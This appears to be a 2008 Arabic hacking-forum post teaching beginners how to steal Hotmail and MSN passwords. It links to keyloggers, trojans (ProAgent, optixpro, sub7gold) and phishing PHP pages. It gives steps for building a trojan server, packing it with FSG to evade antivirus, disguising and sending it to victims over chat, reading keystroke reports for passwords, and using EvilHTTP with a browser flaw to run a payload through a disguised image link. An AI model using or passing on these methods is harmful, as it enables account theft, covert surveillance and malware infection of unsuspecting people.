البرنامج الاول:
الاسم hotmail hack
الحجم kb
التحميل :
http://www.h4palestine.com/download/hotmailhack.zi p
البرنامج الثالث :
اسم البرنامج:برنامج الانتفاضة
الحجم : 172 kb
التحميل :http://www.h4palestine.com/download/hotmail.zip
الشرح :
افتح البرنامج ومن ثم افتح ملف الاعداد hotmail كما في الصورة :
http://waleedessam80.malware-site.www/pas3.jpghttp://waleedessam80.malware-site.www/pas4.jpghttp://waleedessam80.malware-site.www/pas5.jpghttp://waleedessam80.malware-site.www/pas6.jpgالحين كذا خلصنا من تجهيز سيرفر البرنامج كل ماعليك هو ارسال الباتش وانتظر الباسوردات
البرنامج الرابع :
اسم البرنامج :Msn Messenger Password Hacker
الحجم .4 KB
التحميل :في المرفقات
ميزاته :
لا يمكن ضبطه بأي أنتي فايروس .
لا يمكن ضبطه بأي فاحص تروجان أو أي بي سكانر أو الزون ألارم .
اظهار خطأ حقيقي عند التشغيل .
أفضل تصميم ومقتبس من لدى كثير المبرمجين .
:
1البرنامج الخامس:
اسم البرنامج RO-AGENT
الحجم :969 kb
التحميل :
http://www.atmacasoft.com/programlar/ProAgentV1.21 .zip
الشرح :
كل ما عليك تحميل البرنامج وبالمناسبة هذا هو افضل برنامج حديث لسرقة الباسوردات
http://waleedessam80.malware-site.www/pas15.jpghttp://waleedessam80.malware-site.www/pas16.jpgبقي اخر واهم خطوه وهي :"
لتشفير وضغط السيرفر ليصبح حجمه 400 كيلو بايت تقريباً استخدم FSG لتحميله
www.mybiznas.com/tazhacker/fsg.zipالبرنامج السادس :
اسم البرنامج tealth Key Logger
الحجم :
التحميل
:http://www.invisiblekeylogger.com/iksetup.exe
البرنامج السابع :
اسم البرنامج :
Fake MSN Messenger Version 5.0
التحميل :
http://ym2400z.virtualave.net/cgi-b...s/msn/fmsn5.zipاسم البرنامج :العطار (عربي )
الحجم : kb 241
التحميل :
http://www.alattar.s5.com/attar.zipاو من هنا :
http://www.h4palestine.com/download/attar.zipالشرح :
افتح البرنامج ووو......شاهد الصور مع انها ما تحتاج لشرح
http://waleedessam80.malware-site.www/pas9.jpghttp://waleedessam80.malware-site.www/pas10.jpghttp://waleedessam80.malware-site.www/pas11.jpgبعد صنع السيرفر راح تلقاه في سطح المكتب باسم RUNME
الان ستقوم بارساله الى الضحية قم بتغيير اسم الملف الى اى اسم مغرى وتقوم بارساله للضحية من خلال برامج الدردشة مثل
MSN MESSENGER او YAHOO MESSENGER او odigo او mirc
وهذا افضل من ارساله عن طريق الايميل لانه عالبا ما يفشل لان معظم سيرفرات الايميل لها انظمة حماية قوية يمكنها كشف السيرفر ولان هذه الطريقة تكون غير مقنعة للضحايا من جهة اخرى
يمكن للهاكر المحترفين ان يقوموا فبل ارسال السيرفر بضعطه حتى تقل مساحته او تشفيره حتى لا يكشفه الانتى فيرس
بعد ارسال الباتش كده انتهت مهمتك ولن يبقى سوى ان تتابع التقارير التى يرسلها السيرفرالى ايميلك من جهاز الضحية
التعامل مع التقارير الواردة :
+=-=-=-=-=-=-=-=+
التقارير او الرسائل الى راح يرسلها لك السيرفر ترسل من agent او العميل وعنوانه
"Agent" <billgates@microsoft.com>
اليك انت والذى تعتبر الرئيس
boss Boss" <president@whitehouse.gov>
وعنوانها Keyboard report from workstation 123.
اى تقرير المفاتيح التى استخدمها الضحية فهو عميل او جاسوس يعمل لحسابك فى جهاز الضحية دون علمه
يبدا التقرير بالاتى
اسم مستخدم الويندوز Windows user : Intel
رقم مسلسل التقرير Message number : 0012
البداية Startup
النهاية THE END
هذا التقرير يشتمل على ما يستخدمه الضحية من مفاتيح الكى بورد وبالتالى ما ستخدمه من برامج
وما دخله من مواقع وما يكتبه عند تسجيل الدخول فى المواقع والبرامج المحتلفة اى كلمات السر
والفت نظركم الى عدة ملاحظات هامة
Windows user : A
Message number : 0071
Startup.
[RSHIFT][ALT]jpdhjd g;l[ENTER][RSHIFT]ho,;l[ENTER]hg{kvhg
هذا البرنامج فى غاية الحساسية وهذا يميزه عن برامج اخرى جربتها قد يسقط منها بعض الحرووف التى كتبها الضحية سهوا
ولكن عند ضغط الضحية على المفتاح بشدة او لفترة طويلة قد يكرر الحرف للعديد من المرات وهذا يسهل ملاحظته
اذا كان الضحية يكتب بالعربى فراح تلاقى الحرووف غير متناسقة مثلا: v,lhksd
لو تحب تترجمها اكتبها فى المفكرة بعد التحول للغة العربية بنفس الترتييب تلاقيها: رومانسي
احيانا بعض المفاتيح ( وهى مفاتيح الوظائف ) تكتب باسمائها وليست كالرموز مثلا
[BCK] و [del] و [TAB] و [CTL] و [NUM]
ايضا الارقام التى يكتبها الضحية احيانا تكتب بطريقة مختلفة مثل الموجودة على يمين الكى بورد
0 = [INS]
1 = [END]
2 = [DN]
3 = [PGDN]
4 = [<-]
5 = e
6 = [->]
7 = [HOME]
8 = [UP]
9 = [PGup]
اما عن معرفة الباسورد
فمثلا اذا وجدت مثل هذا فى الرسالة فيعنى ان باسورد الا icq هى 300132776
@@ ICQ Registration @@
300132776
واذا وجدت هذا فاليوزر نيم لموقع cubid هو hiroman والباسورد w75ghu
@@ Welcome to Cupid - Microsoft Internet Explorer @@
hironman[ENTER][ENTER]
@@ Welcome to Cupid - Microsoft Internet Explorer @@
[ALT][LSHIFT]w75ghu,
اما الميسنجر وهو الاهم فالباسورد snowwhitelove123456
@@ Sign in to .NET Messenger Service - MSN Messenger @@
snowwhiteinlove[END][DN][PGDN][<-]e[->][ENTER]
غالبا ما تكون اول 3 او 4 رسائل كافية لمعرفة جميع باسوردات الضحية وقد لا تحتاج الباقون الا اذا كنت ترغب فى مراقبةالضحية بدقة وباستمرار
لذا فقد يزيد عدد الرسائل مما قد يسبب ازعاجا لك لذلك فانصح باستخدام خاصية ال JUNK MAIL
او الافضل على الاطلاق هو استخدام برنامج الاوت لوك اكبريس لتنقل اليه هذه الرسائل وتفحصها بدقة وانت غير متصل بالانترنت
اهم المزايا والعيوب :
======
واهم ميزات البرنامج انه يمكن من خلال التقارير الواردة معرفة جميع الباسوردات لدى الضحية
حتى الغير مخزنة بالجهاز وهذا ما تعجز عنه جميع برامج الاختراق الاخرى
ويعيبه ان السيرفر يكتشفه الانتى فيرس (ولكن يمكن تشفيره)
كما انه يعمل فى الخلفية اى بالضغط على CTL+ALT+DEL يظهر البرنامج ضمن البرامج العاملة حاليا
وبالتالى قد يكتشفه الضحية ان كان على درجة فائقة من الذكاء وهذا لا يحدث لانه لو كان كذلك لما تم اختراقه من البداية
البرنامج التاسع :
اسم البرنامج : k2ps
التحميل + الشرح = هنا بالمنتدى
للتحميل :
http://www.h4palestine.com/download/k2ps.zipالهدية الثانية للمبتدئين شرح برنامج k2ps الجديد
البرنامج العاشر :
اسم البرنامج : barrio5
الحجم 50 kb
التحميل + الشرح = هنا بالمنتدى
للتحميل :http://www.h4palestine.com/download/barrio5.zip
البرنامج الحادي عشر :
اسم البرنامج :stukach
التحميل + الشرح = هنا بالمنتدى
للتحميل :
http://www.h4palestine.com/download/stukach.zipبرنامج لسرقة الأيميلات stukach
البرنامج الثاني عشر :
اسم البرنامج :barok
التحميل + الشرح = هنا بالمنتدى
شرح برنامج barok
http://marsi.malware-site.www/tk.GIFالبرنامج الثالث عشر :
اسم البرنامج : باتش لسرقة الباسورد للوحش المدمر
الحجم :52 KB
التحميل :بالمرفقات
الشرح :
1- أرسل الملف للضحية بعد تغيير إسمه .
2- عندما يفتحه الضحية سوف يقول لك أن البرنامج لا يفتح (رسالة خطأ) .
3- اكتب +hh+ لكي يتم قطع الإتصال عنه .
4- عندما يعود اكتب +hi+ في نافذة المحادثة وسوف ترى الباسورد وإسم المستخدم امامك .
ا-
KeyLogger SP 11
----
KeyLogger SP 11
----
KeyLogger
----
SC-KeyLogger2
----
I-KeyLogger
---
ثانيا:اختراق البريد عن طريق صفحات البي اتش بي php:
إن صفحة الــ php هي عبارة عن صفحة إنترنت مبرمجة لتظهر بمظهر معين، و تقوم بوظيفة معينة...
والطريقة كالاتي:
1- تجهيز ملف PHP والذي سنعمل عليه:
أولا يجب عليك تحميل الملف المضغوط من المرفقات(يوجد صفحات كثيرة ،اختر التى تناسبك)
وبعدين فكه من الضغط ، وافتحه
ثم ابحث عن هذا الايميل
romansy_766@hotmail.comوقم بتغيره الى ايميلك الشخصي >> والان احفظ الملف واغلقه.
صورة توضيحية :
http://waleedessam80.malware-site.www/pas14.jpg2- حجز موقع يدعم الـ PHP :اظنها سهلة ما يبغالها شرح*
ويتم ذلك بواسطة برنامج godwill
وظيفة البرنامج :له وظائف كثيرة ..افضلها وهي إنك تصمم صفحة مدموجة بباتش
وترسلها للضحية وأول مايفتحها الضحية راح يجيلك الباسوورد وكل شي على حسب السيرفر أو الباتش اللي حطيته بالصفحة.
الشـــرح + التحميل
تم شرحه هنا بالمنتدى بالتفصيل +بالصور
شرح برنامج الاسطورة godwill لعمل مواقع ملغومة وارسال ايميلات ومسجات اسيكيو
2*
او عن طريق برنامج noob
نفس الوظيفة ..بس لولا اختلاف الأراء لبانت السلع
وقد تم شرحه ايضا هنا بالمنتدى بالصور
رابعا:اختراق البريد عن طريق اختراق الاجهزة:
طبعا الطريقة واضحة جدا
كل ما عليك انك تجهز باتش لبرنامج اختراق فيه خاصية اظهار الباسووردات
والبرامج كثيرة ومنها
optixpro
sub7gold
و ....الخ
وقد تم شرح البرامج اللى في الاعلى هنا في المنتدى
!!
وبعدين رسل الباتش للضحية وخذ الايبي بتاعه من الدوز
وافتح البرنامج وحط الايبي ..والباقي اكيد انت عارفه
لكن اهم شيء انك تشفر الباتش وتضغطه حتى لا يستطيع النورتن بتاع الضحية اكتشافه
بعدين ما راح تقدر تسرق باسورداته الا اذا كان مسجلها ..يعني عامل حفظ SAVE
خامسا:اختراق البريد عن طريق ثغرات المتصفح :
المتطلبات:
1-برنامج لسرقة الباسووردات : اختر اي برنامج يعجبك
2-برنامج EVILHTTP: اضغط هنا للتحميل
3-برنامج FSG :
اضغط هنا للتحميل
الشرح:
1-جهز باتش اي برنامج لسرقة الباسووردات..واضغطه باستخدام برنامج fsg
2-افتح برنامج evilhttp وضع الباتش في الخانة الاولى
واخترالثغرة (mpeg)في الخانة الثانية وخلي النافذة مفتوحة ..اكرر مفتوحة (لا تنزلها تحت، خلها فوق)
3- حول الايبي بتاعك على شكل (Hyper Link) وابعثه للضحية طبعا كلكم راح تسئلوني كيف؟؟ بكل سهولة يعني مثلا هذا الايبي حقي
212.32.125.25
تكتب
http://وفي النهاية تكتب اي شي (على حسب اهتمام الضحية ) يعني يبصير كذا
http://212.32.125.25/cgi-bafy/photo10256.jpgممكن تغير cgi-bafy/photo10256.jpg الى اي كلمة وكذلك الامتداد وذلك حسب الضحية بس الافضل امتداد لصورة لان لو وضعت exe راح يطلب منه تنزيل البرنامج ...ضع امتداد لصورة فقط او txt بس jpg افضل
توضيح اكثر:
http:/your ip/what ever you want.any extension
4- بعد فتح الضحية للوصلة ..سيتم تحميل وتشغيل الباتش تلقائيا بدون موافقة الضحية داخل جهاز الضحية
والاهم الباسووردات راح تجي على ايميلك.
سادسا:اختراق البريد عن طريق برامج التخمين :
الطريقة مشهورة جدا..والبرامج التخمينية كثيرة مثل
wwwhack و web cracker و munga bungas و brutus-aet2
وطريقة عمل هذه البرامج هي التخمين لا اكثر فهي تقوم بتخمين كلمات السر الموجوده باللسته بتاعت البرنامج لكن...هل تعلم كم نسبة نجاح هذه البرامج؟
نسبة نجاحها 10% نعم عشرة بالمئه قد اكون بالغت قليلا فنسبتها ضئيلة جدا
فاتحدى اي شخص يقول انا اخترقت ايميل عن طريق هذه البرامج..فهذه البرامج مستخدمينها كثيرين
والنتائج..لا شيء
الا اذا كان باسورد الضحية يعني زي 3 ارقام او حرف وارقام
هذا شرح لاحد افضل برامج التخمين +التحميل ....جرب يمكن تنفع !!
هدية الرابعة للمبتدئين(برنامج تخمين الباسوورد Brutus + الشرح بالصور )
الأحد ديسمبر 07, 2008 12:59 am